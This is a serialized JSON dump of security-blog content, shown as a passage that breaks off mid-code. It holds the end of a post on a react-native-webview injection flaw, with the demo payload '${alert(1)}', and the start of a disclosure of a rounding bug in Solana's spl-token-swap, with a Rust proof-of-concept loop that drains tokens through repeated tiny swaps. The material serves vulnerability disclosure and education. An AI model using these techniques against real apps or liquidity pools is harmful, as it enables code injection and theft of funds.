};",{"type":28,"tag":116,"props":2401,"children":2402},{"style":1836},[2403],{"type":33,"value":1839},{"type":28,"tag":116,"props":2405,"children":2406},{"style":563},[2407],{"type":33,"value":2240},{"type":28,"tag":116,"props":2409,"children":2410},{"style":370},[2411],{"type":33,"value":2245},{"type":28,"tag":116,"props":2413,"children":2414},{"class":245,"line":400},[2415,2420],{"type":28,"tag":116,"props":2416,"children":2417},{"style":563},[2418],{"type":33,"value":2419},"          \"})();\"",{"type":28,"tag":116,"props":2421,"children":2422},{"style":266},[2423],{"type":33,"value":384},{"type":28,"tag":116,"props":2425,"children":2426},{"class":245,"line":614},[2427,2432],{"type":28,"tag":116,"props":2428,"children":2429},{"style":282},[2430],{"type":33,"value":2431},"        evaluateJavascriptWithFallback",{"type":28,"tag":116,"props":2433,"children":2434},{"style":266},[2435],{"type":33,"value":2436},"(js);\n",{"type":28,"tag":116,"props":2438,"children":2439},{"class":245,"line":631},[2440],{"type":28,"tag":116,"props":2441,"children":2442},{"style":266},[2443],{"type":33,"value":2444},"      }\n",{"type":28,"tag":29,"props":2446,"children":2447},{},[2448,2450,2456,2458,2463,2465,2471],{"type":33,"value":2449},"It basically injects a javascript code with the ",{"type":28,"tag":98,"props":2451,"children":2453},{"className":2452},[],[2454],{"type":33,"value":2455},"injectedJavascriptObject",{"type":33,"value":2457}," wrapped by backticks (`). If you are familiar with javascript, you can immediately see that this enables code injection if we partially control ",{"type":28,"tag":98,"props":2459,"children":2461},{"className":2460},[],[2462],{"type":33,"value":2455},{"type":33,"value":2464},". If we control a single attribute we can inject a payload like ",{"type":28,"tag":98,"props":2466,"children":2468},{"className":2467},[],[2469],{"type":33,"value":2470},"${alert(1)}",{"type":33,"value":2472}," and achieve XSS in the context of the loaded page.",{"type":28,"tag":29,"props":2474,"children":2475},{},[2476,2478,2485],{"type":33,"value":2477},"Then, when scrolling through the open PRs, we saw that there is one that fixes exactly this problem, though we were not the first ones to find it (that's ok, it is a pretty easy bug to find). Here is the ",{"type":28,"tag":87,"props":2479,"children":2482},{"href":2480,"rel":2481},"https://github.com/react-native-webview/react-native-webview/pull/3929/changes",[91],[2483],{"type":33,"value":2484},"PR with the report and fix",{"type":33,"value":141},{"type":28,"tag":29,"props":2487,"children":2488},{},[2489],{"type":33,"value":2490},"The vulnerability is still in the code since the PR has not been merged yet and, since the PR is public, everyone can see the bug. This is indeed the library's fault, but tells us that another thing to keep an eye on is unmerged PRs that fix vulnerabilities. Ideally, an open source library should have a security policy with a contact method so security researchers can report vulnerabilities without making them public. This is because once it is public, more people acknowledge the bug and it is more likely to be exploited in the wild.",{"type":28,"tag":29,"props":2492,"children":2493},{},[2494,2496,2502],{"type":33,"value":2495},"If you want to see if your application is vulnerable, you can simply check if you are injecting ",{"type":28,"tag":98,"props":2497,"children":2499},{"className":2498},[],[2500],{"type":33,"value":2501},"injectedJavaScriptObject",{"type":33,"value":2503}," with some user-provided input, if so, it is recommended to manually merge the PR and rebuild your application with the patched library.",{"type":28,"tag":75,"props":2505,"children":2507},{"id":2506},"conclusion",[2508],{"type":33,"value":2509},"Conclusion",{"type":28,"tag":29,"props":2511,"children":2512},{},[2513],{"type":33,"value":2514},"Most WebView articles focus on classic URL spoofing. In wallet apps, the more interesting problems usually come from capability inheritance: a WebView quietly benefits from permissions granted to the host app and small integration assumptions turn into serious impact.",{"type":28,"tag":2516,"props":2517,"children":2518},"style",{},[2519],{"type":33,"value":2520},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":256,"depth":256,"links":2522},[2523,2527,2530,2531],{"id":65,"depth":256,"text":68,"children":2524},[2525,2526],{"id":77,"depth":293,"text":80},{"id":158,"depth":293,"text":161},{"id":191,"depth":256,"text":194,"children":2528},[2529],{"id":414,"depth":293,"text":417},{"id":2057,"depth":256,"text":2060},{"id":2133,"depth":256,"text":2136,"children":2532},[2533],{"id":2506,"depth":293,"text":2509},"markdown","content:blog:2026-06-18-goldmine-of-insecure-webview-integrations.md","content","blog/2026-06-18-goldmine-of-insecure-webview-integrations.md","blog/2026-06-18-goldmine-of-insecure-webview-integrations","md",[2541,5050,5387,8927,13282,18409,28657,30088,30851,35047,40067,45499,46656,50140,60532,67261,69100,70807,75472,89369,92088,96877,99315,101660,107445,123265,131564,141487,146765,156157],{"_path":2542,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":2543,"description":2544,"image":2545,"date":2549,"isFeatured":19,"tags":2550,"onBlogPage":19,"body":2553,"_type":2534,"_id":5047,"_source":2536,"_file":5048,"_stem":5049,"_extension":2539},"/blog/2022-04-26-spl-swap-rounding","Becoming a Millionaire, 0.000150 BTC at a Time","How we discovered a critical issue in Solana's stable swap implementation. A story about arbitrage and rounding.",{"src":2546,"width":2547,"height":2548},"/posts/spl-swap/title.jpg",600,368,"2022-04-26",[2551,2552],"solana","report",{"type":25,"children":2554,"toc":5041},[2555,2569,2574,2579,2588,2594,2599,2604,2612,2620,2625,2630,2638,2643,2648,3026,3036,3041,3569,3574,3582,3589,3595,3600,3605,3610,3617,3629,3634,3646,3884,3889,3894,3898,3903,3908,3954,3959,3967,3972,3977,3982,4126,4139,4256,4270,4278,4292,4300,4313,4318,4330,4338,4360,4978,4984,4989,5002,5015,5022,5027,5032,5037],{"type":28,"tag":29,"props":2556,"children":2557},{},[2558,2560,2567],{"type":33,"value":2559},"We discovered a critical rounding issue in the Solana Program Library's implementation of stable swap, ",{"type":28,"tag":87,"props":2561,"children":2564},{"href":2562,"rel":2563},"https://github.com/solana-labs/solana-program-library/tree/master/token-swap/program",[91],[2565],{"type":33,"value":2566},"spl-token-swap",{"type":33,"value":2568},". Similar to Neodyme's spl-token-lending exploit, we were able to extract a single token per instruction. This exceeds the value of the 5000 lamport transaction fee on BTC stable swaps, allowing an attacker to profitably drain funds.",{"type":28,"tag":29,"props":2570,"children":2571},{},[2572],{"type":33,"value":2573},"Such BTC stable swaps had over 74 million in combined value. The total value of stable swaps impacted exceed 700 million.",{"type":28,"tag":29,"props":2575,"children":2576},{},[2577],{"type":33,"value":2578},"We would also like to thank the Saber team for their fast triage and remediation.",{"type":28,"tag":29,"props":2580,"children":2581},{},[2582],{"type":28,"tag":2583,"props":2584,"children":2585},"em",{},[2586],{"type":33,"value":2587},"Rounding bugs are an increasingly common vulnerability class, enabled by low transaction costs",{"type":28,"tag":63,"props":2589,"children":2591},{"id":2590},"discovery",[2592],{"type":33,"value":2593},"Discovery",{"type":28,"tag":29,"props":2595,"children":2596},{},[2597],{"type":33,"value":2598},"Parth, one of our researchers, was implementing a graph search for our arbitrage bot to calculate the price of any token relative to SOL.",{"type":28,"tag":29,"props":2600,"children":2601},{},[2602],{"type":33,"value":2603},"After a while, he noticed something weird..",{"type":28,"tag":107,"props":2605,"children":2606},{},[2607],{"type":28,"tag":29,"props":2608,"children":2609},{},[2610],{"type":33,"value":2611},"so either my graph search is wrong\nor its possible to get a ton of money out of nothing",{"type":28,"tag":234,"props":2613,"children":2615},{"code":2614},"KwnjUuZ :              0 9vMJfxu ->              1 EPjFWdd\nKwnjUuZ :              1 EPjFWdd ->              2 9vMJfxu\nKwnjUuZ :              2 9vMJfxu ->              3 EPjFWdd\nHU1tejU :              3 EPjFWdd ->            625 PRT88Rk\n24ZbKS3 :            625 PRT88Rk ->              7 EPjFWdd\n3oRPcFa :              7 EPjFWdd ->              6 BQcdHdA\n",[2616],{"type":28,"tag":98,"props":2617,"children":2618},{"__ignoreMap":7},[2619],{"type":33,"value":2614},{"type":28,"tag":29,"props":2621,"children":2622},{},[2623],{"type":33,"value":2624},"Somehow, we were getting tokens from nothing?",{"type":28,"tag":29,"props":2626,"children":2627},{},[2628],{"type":33,"value":2629},"After taking a look at the pairs on which this was occuring, we quickly realized that only stable swap pairs were impacted.",{"type":28,"tag":234,"props":2631,"children":2633},{"code":2632},"KwnjUuZhTMTSGAaavkLEmSyfobY16JNH4poL9oeeEvE\nHU1tejUtt7AZYrC9SAuqCW9MpuSqsdoedHSb1XUKjUPN\n24ZbKS36rkPv14Tdx8qv4NRyqatTaJ5KgJrT1LxBKn5d\n3oRPcFaRHvv9pPR6nRasigVDkm3k9kTjdfjxUpgLV5Pq\n",[2634],{"type":28,"tag":98,"props":2635,"children":2636},{"__ignoreMap":7},[2637],{"type":33,"value":2632},{"type":28,"tag":29,"props":2639,"children":2640},{},[2641],{"type":33,"value":2642},"This seemed suspicious. Perhaps it had something to do with the stable swap math?",{"type":28,"tag":29,"props":2644,"children":2645},{},[2646],{"type":33,"value":2647},"It was also weird how we could only ever get at most one extra token. As usual, the best way to answer such questions is to read the code. We dived into the stable swap Solana implementation to look for a possible root cause.",{"type":28,"tag":234,"props":2649,"children":2653},{"code":2650,"language":2651,"meta":7,"className":2652,"style":7},"    // Solve for y by approximating: y**2 + b*y = c\n    let mut y = d_val;\n    for _ in 0..ITERATIONS {\n        let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n            .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n        if y_new == y {\n            break;\n        } else {\n            y = y_new;\n        }\n    }\n","rust","language-rust shiki shiki-themes slack-dark",[2654],{"type":28,"tag":98,"props":2655,"children":2656},{"__ignoreMap":7},[2657,2665,2696,2729,2831,2936,2962,2974,2991,3011,3018],{"type":28,"tag":116,"props":2658,"children":2659},{"class":245,"line":246},[2660],{"type":28,"tag":116,"props":2661,"children":2662},{"style":250},[2663],{"type":33,"value":2664},"    // Solve for y by approximating: y**2 + b*y = c\n",{"type":28,"tag":116,"props":2666,"children":2667},{"class":245,"line":256},[2668,2673,2678,2683,2687,2692],{"type":28,"tag":116,"props":2669,"children":2670},{"style":376},[2671],{"type":33,"value":2672},"    let",{"type":28,"tag":116,"props":2674,"children":2675},{"style":376},[2676],{"type":33,"value":2677}," mut",{"type":28,"tag":116,"props":2679,"children":2680},{"style":272},[2681],{"type":33,"value":2682}," y",{"type":28,"tag":116,"props":2684,"children":2685},{"style":370},[2686],{"type":33,"value":2226},{"type":28,"tag":116,"props":2688,"children":2689},{"style":272},[2690],{"type":33,"value":2691}," d_val",{"type":28,"tag":116,"props":2693,"children":2694},{"style":266},[2695],{"type":33,"value":384},{"type":28,"tag":116,"props":2697,"children":2698},{"class":245,"line":293},[2699,2704,2709,2714,2719,2724],{"type":28,"tag":116,"props":2700,"children":2701},{"style":260},[2702],{"type":33,"value":2703},"    for",{"type":28,"tag":116,"props":2705,"children":2706},{"style":272},[2707],{"type":33,"value":2708}," _",{"type":28,"tag":116,"props":2710,"children":2711},{"style":376},[2712],{"type":33,"value":2713}," in",{"type":28,"tag":116,"props":2715,"children":2716},{"style":350},[2717],{"type":33,"value":2718}," 0",{"type":28,"tag":116,"props":2720,"children":2721},{"style":370},[2722],{"type":33,"value":2723},"..",{"type":28,"tag":116,"props":2725,"children":2726},{"style":266},[2727],{"type":33,"value":2728},"ITERATIONS {\n",{"type":28,"tag":116,"props":2730,"children":2731},{"class":245,"line":361},[2732,2737,2741,2746,2750,2755,2759,2763,2767,2772,2776,2781,2786,2790,2795,2799,2804,2809,2813,2817,2821,2826],{"type":28,"tag":116,"props":2733,"children":2734},{"style":376},[2735],{"type":33,"value":2736},"        let",{"type":28,"tag":116,"props":2738,"children":2739},{"style":266},[2740],{"type":33,"value":269},{"type":28,"tag":116,"props":2742,"children":2743},{"style":272},[2744],{"type":33,"value":2745},"y_new",{"type":28,"tag":116,"props":2747,"children":2748},{"style":266},[2749],{"type":33,"value":825},{"type":28,"tag":116,"props":2751,"children":2752},{"style":272},[2753],{"type":33,"value":2754},"_",{"type":28,"tag":116,"props":2756,"children":2757},{"style":266},[2758],{"type":33,"value":1609},{"type":28,"tag":116,"props":2760,"children":2761},{"style":370},[2762],{"type":33,"value":373},{"type":28,"tag":116,"props":2764,"children":2765},{"style":266},[2766],{"type":33,"value":269},{"type":28,"tag":116,"props":2768,"children":2769},{"style":282},[2770],{"type":33,"value":2771},"checked_u8_power",{"type":28,"tag":116,"props":2773,"children":2774},{"style":266},[2775],{"type":33,"value":313},{"type":28,"tag":116,"props":2777,"children":2778},{"style":370},[2779],{"type":33,"value":2780},"&",{"type":28,"tag":116,"props":2782,"children":2783},{"style":272},[2784],{"type":33,"value":2785},"y",{"type":28,"tag":116,"props":2787,"children":2788},{"style":266},[2789],{"type":33,"value":825},{"type":28,"tag":116,"props":2791,"children":2792},{"style":350},[2793],{"type":33,"value":2794},"2",{"type":28,"tag":116,"props":2796,"children":2797},{"style":266},[2798],{"type":33,"value":1829},{"type":28,"tag":116,"props":2800,"children":2801},{"style":370},[2802],{"type":33,"value":2803},"?.",{"type":28,"tag":116,"props":2805,"children":2806},{"style":282},[2807],{"type":33,"value":2808},"checked_add",{"type":28,"tag":116,"props":2810,"children":2811},{"style":266},[2812],{"type":33,"value":313},{"type":28,"tag":116,"props":2814,"children":2815},{"style":272},[2816],{"type":33,"value":1797},{"type":28,"tag":116,"props":2818,"children":2819},{"style":266},[2820],{"type":33,"value":1829},{"type":28,"tag":116,"props":2822,"children":2823},{"style":370},[2824],{"type":33,"value":2825},"?",{"type":28,"tag":116,"props":2827,"children":2828},{"style":266},[2829],{"type":33,"value":2830},")\n",{"type":28,"tag":116,"props":2832,"children":2833},{"class":245,"line":387},[2834,2839,2844,2848,2853,2857,2861,2865,2869,2873,2877,2881,2885,2889,2894,2898,2902,2907,2911,2916,2920,2924,2928,2932],{"type":28,"tag":116,"props":2835,"children":2836},{"style":370},[2837],{"type":33,"value":2838},"            .",{"type":28,"tag":116,"props":2840,"children":2841},{"style":282},[2842],{"type":33,"value":2843},"checked_ceil_div",{"type":28,"tag":116,"props":2845,"children":2846},{"style":266},[2847],{"type":33,"value":313},{"type":28,"tag":116,"props":2849,"children":2850},{"style":282},[2851],{"type":33,"value":2852},"checked_u8_mul",{"type":28,"tag":116,"props":2854,"children":2855},{"style":266},[2856],{"type":33,"value":313},{"type":28,"tag":116,"props":2858,"children":2859},{"style":370},[2860],{"type":33,"value":2780},{"type":28,"tag":116,"props":2862,"children":2863},{"style":272},[2864],{"type":33,"value":2785},{"type":28,"tag":116,"props":2866,"children":2867},{"style":266},[2868],{"type":33,"value":825},{"type":28,"tag":116,"props":2870,"children":2871},{"style":350},[2872],{"type":33,"value":2794},{"type":28,"tag":116,"props":2874,"children":2875},{"style":266},[2876],{"type":33,"value":1829},{"type":28,"tag":116,"props":2878,"children":2879},{"style":370},[2880],{"type":33,"value":2803},{"type":28,"tag":116,"props":2882,"children":2883},{"style":282},[2884],{"type":33,"value":2808},{"type":28,"tag":116,"props":2886,"children":2887},{"style":266},[2888],{"type":33,"value":313},{"type":28,"tag":116,"props":2890,"children":2891},{"style":272},[2892],{"type":33,"value":2893},"b",{"type":28,"tag":116,"props":2895,"children":2896},{"style":266},[2897],{"type":33,"value":1829},{"type":28,"tag":116,"props":2899,"children":2900},{"style":370},[2901],{"type":33,"value":2803},{"type":28,"tag":116,"props":2903,"children":2904},{"style":282},[2905],{"type":33,"value":2906},"checked_sub",{"type":28,"tag":116,"props":2908,"children":2909},{"style":266},[2910],{"type":33,"value":313},{"type":28,"tag":116,"props":2912,"children":2913},{"style":272},[2914],{"type":33,"value":2915},"d_val",{"type":28,"tag":116,"props":2917,"children":2918},{"style":266},[2919],{"type":33,"value":1829},{"type":28,"tag":116,"props":2921,"children":2922},{"style":370},[2923],{"type":33,"value":2825},{"type":28,"tag":116,"props":2925,"children":2926},{"style":266},[2927],{"type":33,"value":1829},{"type":28,"tag":116,"props":2929,"children":2930},{"style":370},[2931],{"type":33,"value":2825},{"type":28,"tag":116,"props":2933,"children":2934},{"style":266},[2935],{"type":33,"value":384},{"type":28,"tag":116,"props":2937,"children":2938},{"class":245,"line":400},[2939,2944,2949,2954,2958],{"type":28,"tag":116,"props":2940,"children":2941},{"style":260},[2942],{"type":33,"value":2943},"        if",{"type":28,"tag":116,"props":2945,"children":2946},{"style":272},[2947],{"type":33,"value":2948}," y_new",{"type":28,"tag":116,"props":2950,"children":2951},{"style":370},[2952],{"type":33,"value":2953}," ==",{"type":28,"tag":116,"props":2955,"children":2956},{"style":272},[2957],{"type":33,"value":2682},{"type":28,"tag":116,"props":2959,"children":2960},{"style":266},[2961],{"type":33,"value":1291},{"type":28,"tag":116,"props":2963,"children":2964},{"class":245,"line":614},[2965,2970],{"type":28,"tag":116,"props":2966,"children":2967},{"style":260},[2968],{"type":33,"value":2969},"            break",{"type":28,"tag":116,"props":2971,"children":2972},{"style":266},[2973],{"type":33,"value":384},{"type":28,"tag":116,"props":2975,"children":2976},{"class":245,"line":631},[2977,2982,2987],{"type":28,"tag":116,"props":2978,"children":2979},{"style":266},[2980],{"type":33,"value":2981},"        } ",{"type":28,"tag":116,"props":2983,"children":2984},{"style":260},[2985],{"type":33,"value":2986},"else",{"type":28,"tag":116,"props":2988,"children":2989},{"style":266},[2990],{"type":33,"value":1291},{"type":28,"tag":116,"props":2992,"children":2993},{"class":245,"line":665},[2994,2999,3003,3007],{"type":28,"tag":116,"props":2995,"children":2996},{"style":272},[2997],{"type":33,"value":2998},"            y",{"type":28,"tag":116,"props":3000,"children":3001},{"style":370},[3002],{"type":33,"value":2226},{"type":28,"tag":116,"props":3004,"children":3005},{"style":272},[3006],{"type":33,"value":2948},{"type":28,"tag":116,"props":3008,"children":3009},{"style":266},[3010],{"type":33,"value":384},{"type":28,"tag":116,"props":3012,"children":3013},{"class":245,"line":713},[3014],{"type":28,"tag":116,"props":3015,"children":3016},{"style":266},[3017],{"type":33,"value":1954},{"type":28,"tag":116,"props":3019,"children":3020},{"class":245,"line":750},[3021],{"type":28,"tag":116,"props":3022,"children":3023},{"style":266},[3024],{"type":33,"value":3025},"    }\n",{"type":28,"tag":29,"props":3027,"children":3028},{},[3029,3034],{"type":28,"tag":2583,"props":3030,"children":3031},{},[3032],{"type":33,"value":3033},"approximate",{"type":33,"value":3035},". Looks suspicious.. Perhaps we really did find a bug in the Solana Program Library?",{"type":28,"tag":29,"props":3037,"children":3038},{},[3039],{"type":33,"value":3040},"With this promising find in mind, we decided to throw together a quick proof of concept. To do this, we attempted to swap very small amounts of tokens back and forth between sBTC and renBTC.",{"type":28,"tag":234,"props":3042,"children":3044},{"code":3043,"language":2651,"meta":7,"className":2652,"style":7},"// from sbtc to renbtc\nfor i in 0 .. 50u8 {\n    // create swap transaction\n    let mut swap_instruction = swap(\n        &spl_token::id(),\n        &swap_pubkey,\n        &swap_authority_pubkey,\n        &test_account_signer.pubkey(),\n        &sbtc_user_account,\n        &sbtc_reserve,\n        &renbtc_reserve,\n        &renbtc_user_account,\n        &admin_fee_account_sbtc_to_ren,\n        1,\n        2\n    ).unwrap();\n\n    // nonce\n    swap_instruction.data.append(&mut vec![i, extranonce]);\n\n    let mut instructions = vec![];\n\n    instructions.push(swap_instruction);\n\n    env.execute_as_transaction(&instructions, &vec![&test_account_signer]);\n}\n",[3045],{"type":28,"tag":98,"props":3046,"children":3047},{"__ignoreMap":7},[3048,3056,3096,3104,3134,3162,3179,3195,3220,3236,3252,3268,3284,3300,3312,3320,3341,3348,3356,3423,3430,3459,3466,3496,3503,3562],{"type":28,"tag":116,"props":3049,"children":3050},{"class":245,"line":246},[3051],{"type":28,"tag":116,"props":3052,"children":3053},{"style":250},[3054],{"type":33,"value":3055},"// from sbtc to renbtc\n",{"type":28,"tag":116,"props":3057,"children":3058},{"class":245,"line":256},[3059,3064,3069,3073,3077,3082,3087,3092],{"type":28,"tag":116,"props":3060,"children":3061},{"style":260},[3062],{"type":33,"value":3063},"for",{"type":28,"tag":116,"props":3065,"children":3066},{"style":272},[3067],{"type":33,"value":3068}," i",{"type":28,"tag":116,"props":3070,"children":3071},{"style":376},[3072],{"type":33,"value":2713},{"type":28,"tag":116,"props":3074,"children":3075},{"style":350},[3076],{"type":33,"value":2718},{"type":28,"tag":116,"props":3078,"children":3079},{"style":370},[3080],{"type":33,"value":3081}," ..",{"type":28,"tag":116,"props":3083,"children":3084},{"style":350},[3085],{"type":33,"value":3086}," 50",{"type":28,"tag":116,"props":3088,"children":3089},{"style":339},[3090],{"type":33,"value":3091},"u8",{"type":28,"tag":116,"props":3093,"children":3094},{"style":266},[3095],{"type":33,"value":1291},{"type":28,"tag":116,"props":3097,"children":3098},{"class":245,"line":293},[3099],{"type":28,"tag":116,"props":3100,"children":3101},{"style":250},[3102],{"type":33,"value":3103},"    // create swap transaction\n",{"type":28,"tag":116,"props":3105,"children":3106},{"class":245,"line":361},[3107,3111,3115,3120,3124,3129],{"type":28,"tag":116,"props":3108,"children":3109},{"style":376},[3110],{"type":33,"value":2672},{"type":28,"tag":116,"props":3112,"children":3113},{"style":376},[3114],{"type":33,"value":2677},{"type":28,"tag":116,"props":3116,"children":3117},{"style":272},[3118],{"type":33,"value":3119}," swap_instruction",{"type":28,"tag":116,"props":3121,"children":3122},{"style":370},[3123],{"type":33,"value":2226},{"type":28,"tag":116,"props":3125,"children":3126},{"style":282},[3127],{"type":33,"value":3128}," swap",{"type":28,"tag":116,"props":3130,"children":3131},{"style":266},[3132],{"type":33,"value":3133},"(\n",{"type":28,"tag":116,"props":3135,"children":3136},{"class":245,"line":387},[3137,3142,3147,3152,3157],{"type":28,"tag":116,"props":3138,"children":3139},{"style":370},[3140],{"type":33,"value":3141},"        &",{"type":28,"tag":116,"props":3143,"children":3144},{"style":266},[3145],{"type":33,"value":3146},"spl_token",{"type":28,"tag":116,"props":3148,"children":3149},{"style":370},[3150],{"type":33,"value":3151},"::",{"type":28,"tag":116,"props":3153,"children":3154},{"style":282},[3155],{"type":33,"value":3156},"id",{"type":28,"tag":116,"props":3158,"children":3159},{"style":266},[3160],{"type":33,"value":3161},"(),\n",{"type":28,"tag":116,"props":3163,"children":3164},{"class":245,"line":400},[3165,3169,3174],{"type":28,"tag":116,"props":3166,"children":3167},{"style":370},[3168],{"type":33,"value":3141},{"type":28,"tag":116,"props":3170,"children":3171},{"style":272},[3172],{"type":33,"value":3173},"swap_pubkey",{"type":28,"tag":116,"props":3175,"children":3176},{"style":266},[3177],{"type":33,"value":3178},",\n",{"type":28,"tag":116,"props":3180,"children":3181},{"class":245,"line":614},[3182,3186,3191],{"type":28,"tag":116,"props":3183,"children":3184},{"style":370},[3185],{"type":33,"value":3141},{"type":28,"tag":116,"props":3187,"children":3188},{"style":272},[3189],{"type":33,"value":3190},"swap_authority_pubkey",{"type":28,"tag":116,"props":3192,"children":3193},{"style":266},[3194],{"type":33,"value":3178},{"type":28,"tag":116,"props":3196,"children":3197},{"class":245,"line":631},[3198,3202,3207,3211,3216],{"type":28,"tag":116,"props":3199,"children":3200},{"style":370},[3201],{"type":33,"value":3141},{"type":28,"tag":116,"props":3203,"children":3204},{"style":272},[3205],{"type":33,"value":3206},"test_account_signer",{"type":28,"tag":116,"props":3208,"children":3209},{"style":370},[3210],{"type":33,"value":141},{"type":28,"tag":116,"props":3212,"children":3213},{"style":282},[3214],{"type":33,"value":3215},"pubkey",{"type":28,"tag":116,"props":3217,"children":3218},{"style":266},[3219],{"type":33,"value":3161},{"type":28,"tag":116,"props":3221,"children":3222},{"class":245,"line":665},[3223,3227,3232],{"type":28,"tag":116,"props":3224,"children":3225},{"style":370},[3226],{"type":33,"value":3141},{"type":28,"tag":116,"props":3228,"children":3229},{"style":272},[3230],{"type":33,"value":3231},"sbtc_user_account",{"type":28,"tag":116,"props":3233,"children":3234},{"style":266},[3235],{"type":33,"value":3178},{"type":28,"tag":116,"props":3237,"children":3238},{"class":245,"line":713},[3239,3243,3248],{"type":28,"tag":116,"props":3240,"children":3241},{"style":370},[3242],{"type":33,"value":3141},{"type":28,"tag":116,"props":3244,"children":3245},{"style":272},[3246],{"type":33,"value":3247},"sbtc_reserve",{"type":28,"tag":116,"props":3249,"children":3250},{"style":266},[3251],{"type":33,"value":3178},{"type":28,"tag":116,"props":3253,"children":3254},{"class":245,"line":750},[3255,3259,3264],{"type":28,"tag":116,"props":3256,"children":3257},{"style":370},[3258],{"type":33,"value":3141},{"type":28,"tag":116,"props":3260,"children":3261},{"style":272},[3262],{"type":33,"value":3263},"renbtc_reserve",{"type":28,"tag":116,"props":3265,"children":3266},{"style":266},[3267],{"type":33,"value":3178},{"type":28,"tag":116,"props":3269,"children":3270},{"class":245,"line":779},[3271,3275,3280],{"type":28,"tag":116,"props":3272,"children":3273},{"style":370},[3274],{"type":33,"value":3141},{"type":28,"tag":116,"props":3276,"children":3277},{"style":272},[3278],{"type":33,"value":3279},"renbtc_user_account",{"type":28,"tag":116,"props":3281,"children":3282},{"style":266},[3283],{"type":33,"value":3178},{"type":28,"tag":116,"props":3285,"children":3286},{"class":245,"line":796},[3287,3291,3296],{"type":28,"tag":116,"props":3288,"children":3289},{"style":370},[3290],{"type":33,"value":3141},{"type":28,"tag":116,"props":3292,"children":3293},{"style":272},[3294],{"type":33,"value":3295},"admin_fee_account_sbtc_to_ren",{"type":28,"tag":116,"props":3297,"children":3298},{"style":266},[3299],{"type":33,"value":3178},{"type":28,"tag":116,"props":3301,"children":3302},{"class":245,"line":847},[3303,3308],{"type":28,"tag":116,"props":3304,"children":3305},{"style":350},[3306],{"type":33,"value":3307},"        1",{"type":28,"tag":116,"props":3309,"children":3310},{"style":266},[3311],{"type":33,"value":3178},{"type":28,"tag":116,"props":3313,"children":3314},{"class":245,"line":898},[3315],{"type":28,"tag":116,"props":3316,"children":3317},{"style":350},[3318],{"type":33,"value":3319},"        2\n",{"type":28,"tag":116,"props":3321,"children":3322},{"class":245,"line":907},[3323,3328,3332,3337],{"type":28,"tag":116,"props":3324,"children":3325},{"style":266},[3326],{"type":33,"value":3327},"    )",{"type":28,"tag":116,"props":3329,"children":3330},{"style":370},[3331],{"type":33,"value":141},{"type":28,"tag":116,"props":3333,"children":3334},{"style":282},[3335],{"type":33,"value":3336},"unwrap",{"type":28,"tag":116,"props":3338,"children":3339},{"style":266},[3340],{"type":33,"value":1445},{"type":28,"tag":116,"props":3342,"children":3343},{"class":245,"line":981},[3344],{"type":28,"tag":116,"props":3345,"children":3346},{"emptyLinePlaceholder":19},[3347],{"type":33,"value":1044},{"type":28,"tag":116,"props":3349,"children":3350},{"class":245,"line":1011},[3351],{"type":28,"tag":116,"props":3352,"children":3353},{"style":250},[3354],{"type":33,"value":3355},"    // nonce\n",{"type":28,"tag":116,"props":3357,"children":3358},{"class":245,"line":1029},[3359,3364,3368,3373,3377,3382,3386,3390,3395,3400,3404,3409,3413,3418],{"type":28,"tag":116,"props":3360,"children":3361},{"style":272},[3362],{"type":33,"value":3363},"    swap_instruction",{"type":28,"tag":116,"props":3365,"children":3366},{"style":370},[3367],{"type":33,"value":141},{"type":28,"tag":116,"props":3369,"children":3370},{"style":266},[3371],{"type":33,"value":3372},"data",{"type":28,"tag":116,"props":3374,"children":3375},{"style":370},[3376],{"type":33,"value":141},{"type":28,"tag":116,"props":3378,"children":3379},{"style":282},[3380],{"type":33,"value":3381},"append",{"type":28,"tag":116,"props":3383,"children":3384},{"style":266},[3385],{"type":33,"value":313},{"type":28,"tag":116,"props":3387,"children":3388},{"style":370},[3389],{"type":33,"value":2780},{"type":28,"tag":116,"props":3391,"children":3392},{"style":376},[3393],{"type":33,"value":3394},"mut",{"type":28,"tag":116,"props":3396,"children":3397},{"style":282},[3398],{"type":33,"value":3399}," vec!",{"type":28,"tag":116,"props":3401,"children":3402},{"style":266},[3403],{"type":33,"value":347},{"type":28,"tag":116,"props":3405,"children":3406},{"style":272},[3407],{"type":33,"value":3408},"i",{"type":28,"tag":116,"props":3410,"children":3411},{"style":266},[3412],{"type":33,"value":825},{"type":28,"tag":116,"props":3414,"children":3415},{"style":272},[3416],{"type":33,"value":3417},"extranonce",{"type":28,"tag":116,"props":3419,"children":3420},{"style":266},[3421],{"type":33,"value":3422},"]);\n",{"type":28,"tag":116,"props":3424,"children":3425},{"class":245,"line":1038},[3426],{"type":28,"tag":116,"props":3427,"children":3428},{"emptyLinePlaceholder":19},[3429],{"type":33,"value":1044},{"type":28,"tag":116,"props":3431,"children":3432},{"class":245,"line":1047},[3433,3437,3441,3446,3450,3454],{"type":28,"tag":116,"props":3434,"children":3435},{"style":376},[3436],{"type":33,"value":2672},{"type":28,"tag":116,"props":3438,"children":3439},{"style":376},[3440],{"type":33,"value":2677},{"type":28,"tag":116,"props":3442,"children":3443},{"style":272},[3444],{"type":33,"value":3445}," instructions",{"type":28,"tag":116,"props":3447,"children":3448},{"style":370},[3449],{"type":33,"value":2226},{"type":28,"tag":116,"props":3451,"children":3452},{"style":282},[3453],{"type":33,"value":3399},{"type":28,"tag":116,"props":3455,"children":3456},{"style":266},[3457],{"type":33,"value":3458},"[];\n",{"type":28,"tag":116,"props":3460,"children":3461},{"class":245,"line":1071},[3462],{"type":28,"tag":116,"props":3463,"children":3464},{"emptyLinePlaceholder":19},[3465],{"type":33,"value":1044},{"type":28,"tag":116,"props":3467,"children":3468},{"class":245,"line":1137},[3469,3474,3478,3483,3487,3492],{"type":28,"tag":116,"props":3470,"children":3471},{"style":272},[3472],{"type":33,"value":3473},"    